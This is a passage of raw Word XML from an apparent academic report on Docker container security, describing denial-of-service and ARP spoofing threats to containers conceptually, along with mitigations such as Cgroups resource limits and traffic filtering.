    <w:p w14:paraId="3746FBF1" w14:textId="1B2D585A" w:rsidR="008B468D" w:rsidRDefault="003E1486" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">A Denial of service (Dos) </w:t>
      </w:r>
      <w:r w:rsidR="0044773B">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="008972C3">
        <w:t xml:space="preserve"> a type </w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t>of attack</w:t>
      </w:r>
      <w:r w:rsidR="003275B1">
        <w:t xml:space="preserve"> that is more common on network resources.</w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E14833">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="006873D4">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E14833">
        <w:t xml:space="preserve">ually, it </w:t>
      </w:r>
      <w:r w:rsidR="00902EBA">
        <w:t xml:space="preserve">aims to </w:t>
      </w:r>
      <w:r w:rsidR="00E66CDF">
        <w:t>exhaust the victim</w:t>
      </w:r>
      <w:r w:rsidR="008B3D1E">
        <w:t xml:space="preserve">’s systems resources by inundating with </w:t>
      </w:r>
      <w:r w:rsidR="008B43E4">
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidR="00C74453">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008B43E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5EE6">
        <w:t xml:space="preserve">eventually </w:t>
      </w:r>
      <w:r w:rsidR="00464C65">
        <w:t xml:space="preserve">blocking the </w:t>
      </w:r>
      <w:r w:rsidR="00C74453">
        <w:t>regular</w:t>
      </w:r>
      <w:r w:rsidR="00770EEE">
        <w:t xml:space="preserve"> traffic from being processed.</w:t>
      </w:r>
      <w:r w:rsidR="0004069E">
        <w:t xml:space="preserve"> Dos vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="005F7159">
        <w:t xml:space="preserve">allow an attacker to consume </w:t>
      </w:r>
      <w:r w:rsidR="0087667E">
        <w:t xml:space="preserve">the host’s system resources, such as CPU </w:t>
      </w:r>
      <w:r w:rsidR="004F55F1">
        <w:t xml:space="preserve">and memory </w:t>
      </w:r>
      <w:r w:rsidR="00122075">
        <w:t xml:space="preserve">and crash the </w:t>
      </w:r>
      <w:r w:rsidR="00D763F3">
        <w:t>system.</w:t>
      </w:r>
      <w:r w:rsidR="00A70103">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A58">
        <w:t xml:space="preserve">Such an attack can also </w:t>
      </w:r>
      <w:r w:rsidR="00AC247E">
        <w:t>occur</w:t>
      </w:r>
      <w:r w:rsidR="00343A58">
        <w:t xml:space="preserve"> on containers </w:t>
      </w:r>
      <w:r w:rsidR="00AC247E">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00227AD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7F48">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0005699C">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00802CC2">
        <w:t xml:space="preserve"> directly</w:t>
      </w:r>
      <w:r w:rsidR="0005699C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C016E">
        <w:t xml:space="preserve">communicate </w:t>
      </w:r>
      <w:r w:rsidR="003C4154">
        <w:t>with the host kernel</w:t>
      </w:r>
      <w:r w:rsidR="000961D6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00834C75">
        <w:t xml:space="preserve">share </w:t>
      </w:r>
      <w:r w:rsidR="002F68EE">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00834C75">
        <w:t xml:space="preserve"> resources</w:t>
      </w:r>
      <w:r w:rsidR="000204C6">
        <w:t>, such as memory, CPU, and I/O disks</w:t>
      </w:r>
      <w:r w:rsidR="007D333A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00345B48">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00F95C05">
        <w:t xml:space="preserve">system design </w:t>
      </w:r>
      <w:r w:rsidR="000A1082">
        <w:t xml:space="preserve">increases the security </w:t>
      </w:r>
      <w:r w:rsidR="007E5D89">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="004823CA">
        <w:t xml:space="preserve"> and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="007E5D89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004823CA">
        <w:t>on containers.</w:t>
      </w:r>
      <w:r w:rsidR="00EE3B5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B0717">
        <w:t xml:space="preserve">Usually, Dos </w:t>
      </w:r>
      <w:r w:rsidR="000F339D">
        <w:t xml:space="preserve">attack takes place when </w:t>
      </w:r>
      <w:r w:rsidR="00C47135">
        <w:t xml:space="preserve">a single </w:t>
      </w:r>
      <w:r w:rsidR="00D40CF1">
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r w:rsidR="00C47135">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00214F66">
        <w:t xml:space="preserve">consumes </w:t>
      </w:r>
      <w:r w:rsidR="00410B28">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002F6638">
        <w:t>particular resource of the host</w:t>
      </w:r>
      <w:r w:rsidR="00224D04">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0041510F">
        <w:t>deny</w:t>
      </w:r>
      <w:r w:rsidR="00224D04">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="0041510F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006C82">
        <w:t xml:space="preserve">all other containers </w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t>or crash</w:t>
      </w:r>
      <w:r w:rsidR="00160EE7">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t xml:space="preserve"> the host</w:t>
      </w:r>
      <w:r w:rsidR="00160EE7">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
      <w:r w:rsidR="006D11E1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00853D79">
        <w:t xml:space="preserve"> Thus, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00594415">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00CF0F42">
        <w:t>manipulate the container to conduct</w:t>
      </w:r>
      <w:r w:rsidR="0084251B">
        <w:t xml:space="preserve"> various attacks, including DoS and </w:t>
      </w:r>
      <w:r w:rsidR="00F03094">
        <w:t>user-privilege escalation</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1182551774"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:instrText xml:space="preserve"> CITATION JCh16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C615F0">
            <w:instrText xml:space="preserve"> \m MId21</w:instrText>
          </w:r>
          <w:r w:rsidR="00E25F3E">
            <w:instrText xml:space="preserve"> \m SSh20</w:instrText>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[60, 61, 62]</w:t>
          </w:r>
          <w:r w:rsidR="00A94609">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F03094">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC46583" w14:textId="3211EC9E" w:rsidR="00B23842" w:rsidRDefault="00B23842" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">The result of Dos attack </w:t>
      </w:r>
      <w:r w:rsidR="00D532B3">
        <w:t xml:space="preserve">on containers is usually </w:t>
      </w:r>
      <w:r w:rsidR="00F6243E">
        <w:t>exhausting the host’s resources</w:t>
      </w:r>
      <w:r w:rsidR="00150B2C">
        <w:t xml:space="preserve">. However, it can be mitigated using various </w:t>
      </w:r>
      <w:r w:rsidR="00826476">
        <w:t>techniques.</w:t>
      </w:r>
      <w:r w:rsidR="00DF22C0">
        <w:t xml:space="preserve"> One of the effective measures is to </w:t>
      </w:r>
      <w:r w:rsidR="006814E2">
        <w:t>limit resources allocation to each container in</w:t>
      </w:r>
      <w:r w:rsidR="00202EEE">
        <w:t xml:space="preserve"> the Docker cluster.</w:t>
      </w:r>
      <w:r w:rsidR="007D127F">
        <w:t xml:space="preserve"> To achieve this</w:t>
      </w:r>
      <w:r w:rsidR="00E56811">
        <w:t xml:space="preserve">, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00291CF6">
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidR="00E56811">
        <w:t xml:space="preserve"> Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="00607C9B">
        <w:t xml:space="preserve">, a Linux kernel feature to </w:t>
      </w:r>
      <w:r w:rsidR="0031145B">
        <w:t>allocate</w:t>
      </w:r>
      <w:r w:rsidR="00607C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D01A0">
        <w:t>resources manually to each container</w:t>
      </w:r>
      <w:r w:rsidR="00AB23C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B1473">
        <w:t xml:space="preserve"> The Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="002275CE">
        <w:t xml:space="preserve"> provide useful metrics </w:t>
      </w:r>
      <w:r w:rsidR="007F7A82">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004B1473">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00270D0B">
        <w:t xml:space="preserve">ensures each container </w:t>
      </w:r>
      <w:r w:rsidR="00C3564B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00D92714">
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D92714">
        <w:t>its allocated resources</w:t>
      </w:r>
      <w:r w:rsidR="00DD10C4">
        <w:t xml:space="preserve">, preventing </w:t>
      </w:r>
      <w:r w:rsidR="00C43CE9">
        <w:t>denial of service attack</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A2D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00347ECD">
        <w:t xml:space="preserve"> They are also essential </w:t>
      </w:r>
      <w:r w:rsidR="00A646E4">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00C76D8C">
        <w:t>control and manage resources</w:t>
      </w:r>
      <w:r w:rsidR="00146E4E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006437D8">
        <w:t xml:space="preserve"> specifically on</w:t>
      </w:r>
      <w:r w:rsidR="00C76D8C">
        <w:t xml:space="preserve"> multi-tenant </w:t>
      </w:r>
      <w:r w:rsidR="00C316C2">
        <w:t>platforms</w:t>
      </w:r>
      <w:r w:rsidR="0035524A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C97F79">
        <w:t>like PaaS</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-248346056"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A5793A">
            <w:instrText xml:space="preserve"> \m JCh16</w:instrText>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35, 60]</w:t>
          </w:r>
          <w:r w:rsidR="00536E17">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0035524A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541881B" w14:textId="61C0A099" w:rsidR="00E25F3E" w:rsidRDefault="00B063AA" w:rsidP="00B063AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc86859263"/>
      <w:r>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r w:rsidR="007E412A">
        <w:t>Poisoning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidR="007E412A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A96FBC" w14:textId="4B9BCBE1" w:rsidR="00B35CEC" w:rsidRDefault="0066771D" w:rsidP="00DA4F65">
      <w:r>
        <w:t>Address Resolution Protocol (ARP)</w:t>
      </w:r>
      <w:r w:rsidR="00D101C4">
        <w:t xml:space="preserve"> is a communication protocol that operates </w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="00D75407">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t>data link layer</w:t>
      </w:r>
      <w:r w:rsidR="00A63667">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00155EF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00BC5808">
        <w:t>reso</w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t>lve</w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A63667">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t xml:space="preserve">MAC address to </w:t>
      </w:r>
      <w:r w:rsidR="001122BF">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E229C0">
        <w:t>known</w:t>
      </w:r>
      <w:r w:rsidR="001122BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3DCA">
        <w:t>IP address.</w:t>
      </w:r>
      <w:r w:rsidR="006605C9">
        <w:t xml:space="preserve"> It </w:t>
      </w:r>
      <w:r w:rsidR="00CB03C2">
        <w:t xml:space="preserve">functions without </w:t>
      </w:r>
      <w:r w:rsidR="00680A53">
        <w:t xml:space="preserve">applying any security measures. </w:t>
      </w:r>
      <w:r w:rsidR="000B60E1">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="002E3007">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00954AAD">
        <w:t xml:space="preserve"> means</w:t>
      </w:r>
      <w:r w:rsidR="00D0480B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B35CEC">
        <w:t>that it is v</w:t>
      </w:r>
      <w:r w:rsidR="00F2358B">
        <w:t>ulnerable to various threats, like ARP spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00A40D49">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00AC22EA">
        <w:t>takes place only on LAN</w:t>
      </w:r>
      <w:r w:rsidR="006A145D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t xml:space="preserve"> ARP spoofing </w:t>
      </w:r>
      <w:r w:rsidR="00A9314B">
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00346AEA">
        <w:t xml:space="preserve"> technique that</w:t>
      </w:r>
      <w:r w:rsidR="001854AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807A75">
        <w:t xml:space="preserve">allows a malicious actor to </w:t>
      </w:r>
      <w:r w:rsidR="00807A75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">send </w:t>
      </w:r>
      <w:r w:rsidR="001229DD">
        <w:t xml:space="preserve">falsified </w:t>
      </w:r>
      <w:r w:rsidR="00051068">
        <w:t xml:space="preserve">ARP messages </w:t>
      </w:r>
      <w:r w:rsidR="00E72F79">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="0042733D">
        <w:t xml:space="preserve">target machine </w:t>
      </w:r>
      <w:r w:rsidR="002128CF">
        <w:t>over a LAN</w:t>
      </w:r>
      <w:r w:rsidR="0026671F">
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="001E69CC">
        <w:t xml:space="preserve">enables the attacker to intercept the communication </w:t>
      </w:r>
      <w:r w:rsidR="009B11C0">
        <w:t>and steal useful information</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="882449184"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:instrText xml:space="preserve"> CITATION MDa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[63]</w:t>
          </w:r>
          <w:r w:rsidR="00DB6EA2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="009B11C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD66A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A1C46" w14:textId="756D4491" w:rsidR="007F7A82" w:rsidRDefault="00004567" w:rsidP="00DA4F65">
      <w:r>
        <w:t>Docker supports various types of network</w:t>
      </w:r>
      <w:r w:rsidR="00E65200">
        <w:t xml:space="preserve"> modes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to provide connectivity between contai</w:t>
      </w:r>
      <w:r w:rsidR="00E65200">
        <w:t>ners and the host.</w:t>
      </w:r>
      <w:r w:rsidR="00781200">
        <w:t xml:space="preserve"> It creates </w:t>
      </w:r>
      <w:r w:rsidR="00F444A7">
        <w:t xml:space="preserve">a default virtual bridge </w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E25FB4">
        <w:t xml:space="preserve"> form </w:t>
      </w:r>
      <w:r w:rsidR="00BC05C7">
        <w:t>a LAN</w:t>
      </w:r>
      <w:r w:rsidR="00D87466">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00377134">
        <w:t xml:space="preserve">enabling </w:t>
      </w:r>
      <w:r w:rsidR="00BD5FBA">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="00BC05C7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00081027">
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t xml:space="preserve"> the same host</w:t>
      </w:r>
      <w:r w:rsidR="00377134">
        <w:t xml:space="preserve"> to communicate</w:t>
      </w:r>
      <w:r w:rsidR="00C93D18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE6797">
        <w:t xml:space="preserve"> This means </w:t>
      </w:r>
      <w:r w:rsidR="00E245E9">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="002F42A1">
        <w:t xml:space="preserve">establish similarity </w:t>
      </w:r>
      <w:r w:rsidR="00F95FFA">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00C57B13">
        <w:t>many ways</w:t>
      </w:r>
      <w:r w:rsidR="00582832">
        <w:t xml:space="preserve"> to LAN </w:t>
      </w:r>
      <w:r w:rsidR="002C3703">
        <w:t>segments.</w:t>
      </w:r>
      <w:r w:rsidR="00C57B13">
        <w:t xml:space="preserve"> In this case, </w:t>
      </w:r>
      <w:r w:rsidR="00272C60">
        <w:t xml:space="preserve">containers can also be a victim of </w:t>
      </w:r>
      <w:r w:rsidR="00A923B5">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="009C2F62">
        <w:t xml:space="preserve">ARP related </w:t>
      </w:r>
      <w:r w:rsidR="00C8658B">
        <w:t>threats.</w:t>
      </w:r>
      <w:r w:rsidR="00C739CB">
        <w:t xml:space="preserve"> As mentioned above, the </w:t>
      </w:r>
      <w:r w:rsidR="00745308">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00B30EFB">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00745308">
        <w:t xml:space="preserve">thernet bridge </w:t>
      </w:r>
      <w:r w:rsidR="00B30EFB">
        <w:t xml:space="preserve">forwards </w:t>
      </w:r>
      <w:r w:rsidR="00B97637">
        <w:t>incoming packets without implementing any filtering mechanism</w:t>
      </w:r>
      <w:r w:rsidR="004A21B0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00006F20">
        <w:t xml:space="preserve">exposing </w:t>
      </w:r>
      <w:r w:rsidR="00C84FBE">
        <w:t>containers more prone to ARP spoofing attack</w:t>
      </w:r>
      <w:r w:rsidR="00B008BB">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C84FBE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C37A5D">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="001D0BC3">
        <w:t>containers are</w:t>
      </w:r>
      <w:r w:rsidR="00C37A5D">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="001D0BC3">
        <w:t xml:space="preserve"> not immune to ARP spoofing attack</w:t>
      </w:r>
      <w:r w:rsidR="00466F74">
        <w:t>s</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="105324861"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:instrText xml:space="preserve"> CITATION MKh20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00237A48">
            <w:instrText xml:space="preserve"> \m LLM20</w:instrText>
          </w:r>
          <w:r w:rsidR="003B7484">
            <w:instrText xml:space="preserve"> \m Doc21</w:instrText>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[64, 65, 66]</w:t>
          </w:r>
          <w:r w:rsidR="00F14DBB">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00055C55">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B0BAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A95314" w14:textId="2A1C01E8" w:rsidR="000C0982" w:rsidRDefault="000C0982" w:rsidP="00DA4F65">
      <w:r>
        <w:t xml:space="preserve">The result of this attack </w:t>
      </w:r>
      <w:r w:rsidR="006F5AFD">
        <w:t xml:space="preserve">can have </w:t>
      </w:r>
      <w:r w:rsidR="00FF3732">
        <w:t>profound</w:t>
      </w:r>
      <w:r w:rsidR="0017517C">
        <w:t xml:space="preserve"> implications </w:t>
      </w:r>
      <w:r w:rsidR="009A5BCE">
        <w:t>when an attacker gains access</w:t>
      </w:r>
      <w:r w:rsidR="00F20586">
        <w:t xml:space="preserve"> through a co</w:t>
      </w:r>
      <w:r w:rsidR="00920DC2">
        <w:t>mpromised container.</w:t>
      </w:r>
      <w:r w:rsidR="004A5F27">
        <w:t xml:space="preserve"> Usually, </w:t>
      </w:r>
      <w:r w:rsidR="00E96AF0">
        <w:t xml:space="preserve">attackers use </w:t>
      </w:r>
      <w:r w:rsidR="002641B4">
        <w:t>ARP spoofing technique to g</w:t>
      </w:r>
      <w:r w:rsidR="009638D8">
        <w:t xml:space="preserve">et valuable information </w:t>
      </w:r>
      <w:r w:rsidR="00143DCB">
        <w:t xml:space="preserve">of the traffic </w:t>
      </w:r>
      <w:r w:rsidR="007F1E09">
        <w:t>crossing the bridge</w:t>
      </w:r>
      <w:r w:rsidR="00DD48B6">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="000F2CAA">
        <w:t>passwords and usernames</w:t>
      </w:r>
      <w:r w:rsidR="005D0F21">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD48B6">
        <w:t xml:space="preserve"> Further,</w:t>
      </w:r>
      <w:r w:rsidR="000F2CAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002250B3">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00FF080B">
        <w:t xml:space="preserve">enables attackers to insert malicious </w:t>
      </w:r>
      <w:r w:rsidR="00F75E03">
        <w:t>programs to facil</w:t>
      </w:r>
      <w:r w:rsidR="00B2062E">
        <w:t>ita</w:t>
      </w:r>
      <w:r w:rsidR="00F75E03">
        <w:t xml:space="preserve">te other attacks, such as Dos, </w:t>
      </w:r>
      <w:r w:rsidR="00EC307D">
        <w:t>Man-in-the-middle (MITM), and session hijacking</w:t>
      </w:r>
      <w:r w:rsidR="00B2062E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FD5ECF">
        <w:t xml:space="preserve"> However, such an attack can be defended </w:t>
      </w:r>
      <w:r w:rsidR="00D60C0D">
        <w:t xml:space="preserve">by filtering the incoming traffics </w:t>
      </w:r>
      <w:r w:rsidR="00D705EE">
        <w:t xml:space="preserve">using access control </w:t>
      </w:r>
      <w:r w:rsidR="00B67CAB">
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidR="00BC3AC3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00585498">
        <w:t xml:space="preserve">configuring </w:t>
      </w:r>
      <w:r w:rsidR="009073A6">
        <w:t>a proper network</w:t>
      </w:r>
      <w:r w:rsidR="000B0AC1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00331D5B">
        <w:t xml:space="preserve"> More specifically, </w:t>
      </w:r>
      <w:r w:rsidR="00F27F33">
        <w:t xml:space="preserve">the MAC address of </w:t>
      </w:r>
      <w:r w:rsidR="00036159">
        <w:t xml:space="preserve">the legitimate </w:t>
      </w:r>
      <w:r w:rsidR="001360DB">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="003B20DB">
        <w:t>can be</w:t>
      </w:r>
      <w:r w:rsidR="00847439">
        <w:t xml:space="preserve"> isolated </w:t>
      </w:r>
      <w:r w:rsidR="003B20DB">
        <w:t xml:space="preserve">to prevent </w:t>
      </w:r>
      <w:r w:rsidR="00240D5C">
        <w:t>ARP spoofing attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="491058749"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008E56C5">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00394FC2">
            <w:instrText xml:space="preserve"> \m JNa20</w:instrText>
          </w:r>
          <w:r w:rsidR="008E56C5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51, 67]</w:t>
          </w:r>
